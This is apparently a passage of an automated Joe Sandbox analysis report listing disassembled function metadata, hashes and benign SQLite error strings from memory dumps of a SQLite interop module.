                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Iaa0f8e0c251cfd1d.$I1bf8975e567ea97a.I8b0d9e6837e61abc.
                                                                                                                                                                                                                                      • String ID: domain error
                                                                                                                                                                                                                                      • API String ID: 2338593189-1959930803
                                                                                                                                                                                                                                      • Opcode ID: ff3ff1db4aee24c9afe8fe37f060c2bfa212e383efaa8d6771fc6916a064bcc5
                                                                                                                                                                                                                                      • Instruction ID: 249dbd912de531e07c4443d27d9bafefa2f85c4478b349916211f3a4534b8dd8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff3ff1db4aee24c9afe8fe37f060c2bfa212e383efaa8d6771fc6916a064bcc5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 955126B2E253115BC7009F7C9C5195BB395ABC5228F148A79FD6887340FB39DB0987E2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00011969,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,00000000,?), ref: 6BC60723
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-2469029621
                                                                                                                                                                                                                                      • Opcode ID: 21a267572818511d7afb8fb615dd1b0ce006302aa0473ddb86ed7d801f323754
                                                                                                                                                                                                                                      • Instruction ID: 9c5ca587fbcf9d4bd1db182de7b145f80b5248bde019e740614fb256cc1144e5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21a267572818511d7afb8fb615dd1b0ce006302aa0473ddb86ed7d801f323754
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC515971A151056BC304DF69D8C5E9AB7A0FF48365F104095E90CEB681F738EAA0CBF1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI94ecb64e9dbb8338.SQLITE.INTEROP ref: 6BC4A65D
                                                                                                                                                                                                                                      • SIffb8076c269e2a85.SQLITE.INTEROP ref: 6BC4A702
                                                                                                                                                                                                                                      • SI8b0d9e6837e61abc.SQLITE.INTEROP ref: 6BC4A70D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I8b0d9e6837e61abc.I94ecb64e9dbb8338.Iffb8076c269e2a85.
                                                                                                                                                                                                                                      • String ID: %!.15g$%!.20e$%lld$NULL
                                                                                                                                                                                                                                      • API String ID: 346610330-655469614
                                                                                                                                                                                                                                      • Opcode ID: da801f3807cd9422f6f93b47daede752b1805783476293e9c5de71029b22b640
                                                                                                                                                                                                                                      • Instruction ID: 4ff40bbf2cad50d05c94de46ba2255cbaf286a070e0f9498d04a96900a6a7e75
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: da801f3807cd9422f6f93b47daede752b1805783476293e9c5de71029b22b640
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC418B759145045BD320DF78A84166EB7F8EFC5319B0445FEE8498A602FB3AA71983E2
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000136D0,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC8B2BF
                                                                                                                                                                                                                                        • Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,invalid,?,6BC560BE), ref: 6BC55DD8
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BC8B1E3
                                                                                                                                                                                                                                      • SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC8B261
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC8B2B8
                                                                                                                                                                                                                                      • source and destination must be distinct, xrefs: 6BC8B174
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC8B2A9
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC8B2B3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.$Iaa0f8e0c251cfd1d._memset
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse$source and destination must be distinct
                                                                                                                                                                                                                                      • API String ID: 3417782715-2726992392
                                                                                                                                                                                                                                      • Opcode ID: 6c3bf5be025587376f2470ff37ca633f1416b4047acafc49cd9af98cb3bc96f8
                                                                                                                                                                                                                                      • Instruction ID: 39a78f856c2e16b72534fe9bf0ca7f8de28dd627641fe34aedded77650d0b8a2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c3bf5be025587376f2470ff37ca633f1416b4047acafc49cd9af98cb3bc96f8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B441F5B0A213019BEB009F799846B0BBBA4BF4171DF404439E959DF241FB3EE615C7A6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIa364946505687432.SQLITE.INTEROP(?,?,?,?,?,6BCC19E2,?,?,?), ref: 6BCC1052
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Ia364946505687432.
                                                                                                                                                                                                                                      • String ID: cannot open value of type %s$d$integer$no such rowid: %lld$null$real
                                                                                                                                                                                                                                      • API String ID: 933419003-3431996195
                                                                                                                                                                                                                                      • Opcode ID: 54fa216b0adaef93eb84e98f9d25253a0b4e75208d2c84eecc8044f07c9ee9b9
                                                                                                                                                                                                                                      • Instruction ID: 5b358bf281b5dd9f6593cc57922b2c2a9ee104ca81272d66e253bef1605192b7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 54fa216b0adaef93eb84e98f9d25253a0b4e75208d2c84eecc8044f07c9ee9b9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8741CEB46147009FD714CF2AD881A2BB3F5FF89324F1086ADE8498B741E739E955CB92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 6BCED442
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000247EF,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BCED513
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d._memset
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$fts5$fts5_source_id$misuse
                                                                                                                                                                                                                                      • API String ID: 3064812586-629638660
                                                                                                                                                                                                                                      • Opcode ID: 0114d37d109b577fe066b85681b8475aa864acf6d8a361ce1fe570a13cbbbc80
                                                                                                                                                                                                                                      • Instruction ID: 214b1f5a0e16dbf1319ac2e3f8b211b3ca98b1a5097d34d94a298ae4b1d2361a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0114d37d109b577fe066b85681b8475aa864acf6d8a361ce1fe570a13cbbbc80
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E2122B2BB621163E2201B396C43B57369C8B90669F004478FD59DE282FB6DE71681F6
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,invalid), ref: 6BC575E6
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AD91,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57604
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC575FD
                                                                                                                                                                                                                                      • API call with %s database connection pointer, xrefs: 6BC575DF
                                                                                                                                                                                                                                      • invalid, xrefs: 6BC575DA
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC575EE
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC575F8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$invalid$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-2531747836
                                                                                                                                                                                                                                      • Opcode ID: 8d19f85dc50f302233b793f25540b3926d9a4c1611aacdf0a5bea18749cfde07
                                                                                                                                                                                                                                      • Instruction ID: 1e180d15bdb73781cee939e024cdbba00455dca60822f5fa69085d760c1bf814
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d19f85dc50f302233b793f25540b3926d9a4c1611aacdf0a5bea18749cfde07
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10F024329AD2482AEA04565CFC02F553F96870132CF0000DEF05C5E083FE1E96A61279
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,invalid,?,6BC560BE), ref: 6BC55DD8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: API call with %s database connection pointer$NULL$invalid$unopened
                                                                                                                                                                                                                                      • API String ID: 2981141233-406007132
                                                                                                                                                                                                                                      • Opcode ID: f0020c697d1d329516df6d3be3aefab856004e8aca870adba7dbe1ae09c2faea
                                                                                                                                                                                                                                      • Instruction ID: 55754560ac5e91fb18ede40040192f1255f05bb384d9e009d1f2ba0f9de46dff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0020c697d1d329516df6d3be3aefab856004e8aca870adba7dbe1ae09c2faea
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6AE065A37FF24419D92417742C0AF9D2B96079132AF1404A6F66A9C4D5FE4C42B92035
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,invalid), ref: 6BC57575
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AD9A,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000015,API call with %s database connection pointer,invalid), ref: 6BC57590
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6BC57589
                                                                                                                                                                                                                                      • API call with %s database connection pointer, xrefs: 6BC5756E
                                                                                                                                                                                                                                      • invalid, xrefs: 6BC57569
                                                                                                                                                                                                                                      • fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5757A
                                                                                                                                                                                                                                      • misuse, xrefs: 6BC57584
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$API call with %s database connection pointer$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$invalid$misuse
                                                                                                                                                                                                                                      • API String ID: 2981141233-2531747836
                                                                                                                                                                                                                                      • Opcode ID: 756339f74be97c747111192116e1de32f208dda1e80f1b0426a0c598ba119308
                                                                                                                                                                                                                                      • Instruction ID: 00750278c7846cad828bd457a85a0c4ef59ebcb34e30c06677a48a65f4b3a10a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 756339f74be97c747111192116e1de32f208dda1e80f1b0426a0c598ba119308
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3BF05C716A92482EDB1447549C01F693B45874571DF4040DAF07C1E4C6F90D96F36329
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SIb50fc3839c421869.SQLITE.INTEROP(?,?,?,?,000000FF), ref: 6BC4226D
                                                                                                                                                                                                                                      • SIb50fc3839c421869.SQLITE.INTEROP(?,?,00000000,?,000000FF), ref: 6BC4228A
                                                                                                                                                                                                                                      • SI353770fd94e573c1.SQLITE.INTEROP(?,?,?,000000FF), ref: 6BC422C5
                                                                                                                                                                                                                                      • SI353770fd94e573c1.SQLITE.INTEROP(?,?), ref: 6BC422E3
                                                                                                                                                                                                                                      • SI353770fd94e573c1.SQLITE.INTEROP(?,?), ref: 6BC42301
                                                                                                                                                                                                                                      • SI353770fd94e573c1.SQLITE.INTEROP(?,?), ref: 6BC4231F
                                                                                                                                                                                                                                      • SIb50fc3839c421869.SQLITE.INTEROP(?,?,?), ref: 6BC4234E
                                                                                                                                                                                                                                      • SI353770fd94e573c1.SQLITE.INTEROP(?,?), ref: 6BC4236C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I353770fd94e573c1.$Ib50fc3839c421869.
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3315215020-0
                                                                                                                                                                                                                                      • Opcode ID: 60f8604eb81737938b47588dc775fddc0712b0f32a02d1c1925758484c29ff29
                                                                                                                                                                                                                                      • Instruction ID: 1a50089c7efadd6bdbd70f5115d3ea46837cf266a2a50cca6b821c3ccfe74789
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60f8604eb81737938b47588dc775fddc0712b0f32a02d1c1925758484c29ff29
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA517176B281046FC700DF68EC459AA73E9EBC9239F1486A5FD1CCB341E635DA518BE0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,0001235A,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,74FF8504,6BC8AEB6,00000001,?,?,?,?,?,6BC68251,74FF8504,?), ref: 6BC59FD9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: I769271af19a2299d.
                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
                                                                                                                                                                                                                                      • API String ID: 2981141233-2469029621
                                                                                                                                                                                                                                      • Opcode ID: c77d4c56df6e194c8bb1e8e950e984617d9168c56e8a329e15bc92b56fac6ce9
                                                                                                                                                                                                                                      • Instruction ID: 96721d92eb012ae05e5a6d83e6bd4e99b5f312838d84b7398d87465fdce3e7ea
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c77d4c56df6e194c8bb1e8e950e984617d9168c56e8a329e15bc92b56fac6ce9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F12AE72A153118FC705CF29C484A0AB7E1FFC8354F554598F8899B341EB38EE66CBA5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: false$null$true
                                                                                                                                                                                                                                      • API String ID: 0-2913297407
                                                                                                                                                                                                                                      • Opcode ID: 72d4e76fdd83705908e81b7e26c21953da9396721a69e2673f232ba111e31d01
